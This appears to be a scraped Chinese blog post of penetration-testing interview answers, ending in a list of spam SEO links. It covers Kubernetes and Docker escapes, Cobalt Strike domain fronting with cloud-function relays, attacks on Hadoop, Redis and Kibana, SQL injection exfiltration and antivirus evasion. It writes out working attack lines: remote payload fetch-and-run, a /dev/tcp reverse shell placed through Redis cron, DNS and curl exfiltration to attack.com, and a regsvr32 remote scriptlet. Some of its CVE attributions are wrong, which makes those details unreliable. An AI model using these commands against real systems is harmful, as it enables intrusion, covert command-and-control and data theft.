当前位置: 首页 > wzjs >正文

网页升级紧急通知直播优化大师软件下载

网页升级紧急通知直播,优化大师软件下载,wordpress add_options_page,小游戏制作平台网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 B站 一、Kubernetes与Docker攻击面及拓展利用方式 二、Cobalt Strike域前置与云函数配置实践 三、内…

 网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

B站

一、Kubernetes与Docker攻击面及拓展利用方式

二、Cobalt Strike域前置与云函数配置实践

三、内网横向攻击可利用设备清单

四、Redis攻击的Linux系统差异

五、SQL注入返回长度限制突破方案

六、免杀技术体系化实现

七、防御体系建设建议

B站

k8s和docker 如何做攻击,有哪些拓展利用方式,是什么原因导致的
cs的域前置和云函数如何去配置
内网攻击的时候,内网有哪些设备可以利用,(hadoop kibana之类的设备)
攻击redis 不同的linux系统有什么不同
sql注入的时候,如果遇到了返回的时候长度不够,怎么解决,如何截取,用什么函数截取
域前置
免杀
一、Kubernetes与Docker攻击面及拓展利用方式

1. 攻击面分析

  • 未授权API访问:Kubernetes API Server默认6443端口若未配置RBAC或网络策略,攻击者可枚举集群资源。典型工具:kube-hunter。
  • 特权容器逃逸:Docker容器以--privileged启动时,攻击者可通过挂载宿主机目录(如/dev)实现逃逸。利用命令示例:
    bashdocker run -it --privileged -v /:/host ubuntu chroot /host bash 
  • 敏感配置泄露:Kubelet默认10250端口泄露Pod信息,通过/pods接口可获取JWT令牌。
  • 镜像投毒攻击:公共仓库(如Docker Hub)的恶意镜像可能包含后门,利用供应链攻击植入恶意代码。

2. 拓展利用链

  • 横向移动路径
    • 通过Service Account权限横向控制其他Pod
    • 利用Calico网络插件漏洞穿透网络隔离
  • 持久化技术
    • 创建恶意CronJob实现定时任务驻留
    • 篡改etcd数据库修改集群配置
  • 云原生逃逸组合技
    • CVE-2020-8558(Kubernetes中间人攻击)+ CVE-2019-5736(runc容器逃逸)形成组合攻击链

3. 漏洞根源

  • 默认配置不安全:K8s默认开启API匿名访问,Docker socket默认权限过高(rw权限分配给docker组)
  • 镜像信任缺失:缺乏镜像签名验证机制,CI/CD流程未集成漏洞扫描
  • 网络策略宽松:默认允许Pod间全互通,未实施NetworkPolicy分段

二、Cobalt Strike域前置与云函数配置实践

1. 域前置(Domain Fronting)技术

  • 实现原理
    • 利用CDN服务商(如Cloudflare、AWS CloudFront)的SNI与Host头分离特性
    • 客户端请求伪装成合法域名(如update.microsoft.com ),实际解析到攻击者C2服务器
  • 配置步骤
    1. 注册CDN服务并绑定合法备案域名
    2. 配置C2 Profile中的http-host-header字段为伪装域名
    3. 使用Malleable C2配置文件定义HTTP头特征:
      http-config {set trust_x_forwarded_for "true";header "Origin" "https://www.google.com"; 
      }
      
  • 检测规避
    • 使用TLS 1.3协议减少握手特征
    • 动态更换Host头匹配热门域名(如Github、Dropbox)

2. 云函数中继配置

  • 主流平台对比

    平台触发方式内存限制超时时间
    AWS LambdaAPI Gateway10GB15分钟
    阿里云FCHTTP触发器3GB10分钟
    腾讯云SCFAPI网关触发1.5GB5分钟
  • 实现步骤

    1. 编写云函数处理逻辑(Python示例):
      pythonimport requests def handler(event): c2_url = 'http://真实C2_IP:端口' return requests.post(c2_url, data=event.body).content 
    2. 配置API网关进行HTTPS转发
    3. 在Cobalt Strike中设置云函数URL为监听器

三、内网横向攻击可利用设备清单

1. 大数据组件

  • Hadoop YARN
    • 利用未授权REST API(默认8088端口)提交恶意任务:
      bashcurl -X POST -d 'shell=/bin/bash -c "curl http://attack.com/payload.sh |sh"' http://hadoop-node:8088/ws/v1/cluster/apps 
  • Spark History Server:CVE-2018-11776实现RCE

2. 日志分析系统

  • Kibana
    • CVE-2019-7609原型链污染漏洞执行系统命令
    • 利用Canvas组件加载恶意SVG文件触发XSS
  • Splunk:通过未授权TCP端口(8089)上传恶意应用包

3. 数据库服务

  • Redis:SSH公钥写入/root/.ssh/authorized_keys
  • MongoDB:未授权访问直接执行db.adminCommand({setParameter: 1, internalQueryExecMaxBlockingSortBytes: 2000000000})导致内存耗尽

4. 版本控制系统

  • GitLab:CVE-2021-22205 ExifTool漏洞上传恶意图片触发RCE
  • Gitea:1.4.0版本目录穿越漏洞读取/etc/passwd

5. 网络设备与服务

  • Zabbix:默认口令admin/zabbix登录后通过Script功能执行命令
  • Jenkins:Groovy脚本控制台直接执行系统命令

四、Redis攻击的Linux系统差异

1. 文件路径差异

  • Ubuntu/Debian
    bashconfig set dir /var/lib/redis config set dbfilename authorized_keys 
  • CentOS/RHEL
    bashconfig set dir /var/lib/redis/data 

2. 权限模型对比

  • AppArmor限制(Ubuntu): Redis默认配置限制写入/etc目录,需修改/etc/apparmor.d/usr.sbin.redis-server
  • SELinux策略(RHEL): 默认禁止Redis修改ssh目录,需执行:
    bashsetsebool -P redis_cluster_management 1 

3. 利用方式调整

  • 写入定时任务
    bashecho -e "\n\n* * * * * bash -c 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1'\n\n" | redis-cli -x set 1 redis-cli config set dir /var/spool/cron/crontabs/ redis-cli config set dbfilename root redis-cli save 
  • Docker逃逸利用: 当Redis运行在容器内时,需挂载宿主机目录:
    bashdocker run -v /:/host redis redis-cli config set dir /host/etc 

五、SQL注入返回长度限制突破方案

1. 数据截取函数

  • MySQL
    sqlSELECT SUBSTR((SELECT user()),1,1) SELECT MID(version(),2,1)
  • Oracle
    sqlSELECT SUBSTR(banner,1,1) FROM v$version 
  • MSSQL
    sqlSELECT SUBSTRING(@@version,1,1)

2. 分块获取技术

  • 二进制逐位判断
    sqlIF(ASCII(SUBSTR(database(),1,1))&1, SLEEP(2), 1)
  • 组合查询拼接
    sqlSELECT GROUP_CONCAT(SUBSTR(column,1,10)), GROUP_CONCAT(SUBSTR(column,11,10)) FROM table 

3. 外带数据传输

  • DNS Log外传
    sqlSELECT LOAD_FILE(CONCAT('\\\\',HEX(user()),'.attack.com\\test')) 
  • HTTP带外通道
    sqlEXEC xp_cmdshell 'curl http://attack.com/`whoami`' 

六、免杀技术体系化实现

1. 静态免杀技术

  • PE文件修改
    • 节区特征擦除:使用工具PE-bear修改节区名称(如.text -> .data)
    • 入口点混淆:在OEP插入垃圾指令jmp $+5
  • 壳加密方案
    加壳类型检测规避率适用场景
    UPX修改版60%快速打包
    VMProtect85%商业软件保护
    自研壳95%+APT长期驻留

2. 动态免杀技术

  • 进程镂空(Process Hollowing)
    cCreateProcess(挂起状态) -> ZwUnmapViewOfSection -> WriteMemory -> ResumeThread 
  • 内存模块反射加载: 使用sRDI(Shellcode Reflective DLL Injection)技术直接映射DLL到内存

3. 合法工具滥用

  • MSBuild加载C# Payload
    xml<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Target Name="Exec"> <Exec Command="powershell -enc JABz..."/> </Target> </Project>
  • Regsvr32执行远程脚本
    cmdregsvr32 /s /n /u /i:http://attack.com/test.sct scrobj.dll 

七、防御体系建设建议

1. 容器安全加固

  • 实施Pod Security Policies(PSP)
  • 部署Falco进行运行时异常检测
  • 镜像扫描集成Trivy+Clair组合方案

2. 内网纵深防御

  • 部署微分段防火墙(如Illumio)
  • 实施JIT(Just-In-Time)访问控制
  • 关键系统部署Honeypot诱捕节点

3. 攻击面管理

  • 使用Nexpose定期扫描暴露服务
  • 建立威胁情报驱动的动态防御机制
  • 实施红蓝对抗常态化演练
http://www.dtcms.com/wzjs/288457.html

相关文章:

  • 没有服务器怎样做网站seo流量增加软件
  • 做百度移动网站整合营销案例举例说明
  • 网站管理助手建站教程浏览器打开网站
  • 网站二维码弹窗今天热搜前十名
  • 淘宝上开做网站的店铺一站式网站建设公司
  • 唯品会一家专门做特卖的网站如何接广告赚钱
  • 东莞网站建设平台百度关键词代做排名
  • 做网站前端有前途么?深圳优化排名公司
  • 教育类网站建设策划书今天新疆新闻头条
  • 在招聘网站做销售技巧微信信息流广告投放
  • 网站建设以及运营方面电商平台开发
  • 上海网站建设类岗位网络营销的四大特点
  • 做营销型网站的企业如何推销自己的产品
  • 免费个人网站模板在线代理浏览网页
  • 赣州宏达网站建设想找搜索引擎优化
  • 网站建设销售销售流程国外免费网站域名服务器查询软件
  • 工程建设有哪些网站优化seo怎么做
  • 东营做网站佛山百度网站快速排名
  • 自己做网站外包网络推广发帖网站
  • 苏州园区做网站公司网站推广的案例
  • 昆明网站建设首选公司惠州seo排名
  • 哈尔滨做网站费用报价品牌推广软文200字
  • 百度云建设网站seo整站排名
  • 九江网站开发公司台州seo排名优化
  • 坂田做网站多少钱百度助手下载安装
  • 招代理的网站要怎么做的企业营销案例
  • 做中医诊所网站互联网营销案例
  • 网站建设文章网站推广宣传语
  • 手机网站建设官网百度关键词排名爬虫
  • 北京建设官网证书查询廊坊seo优化排名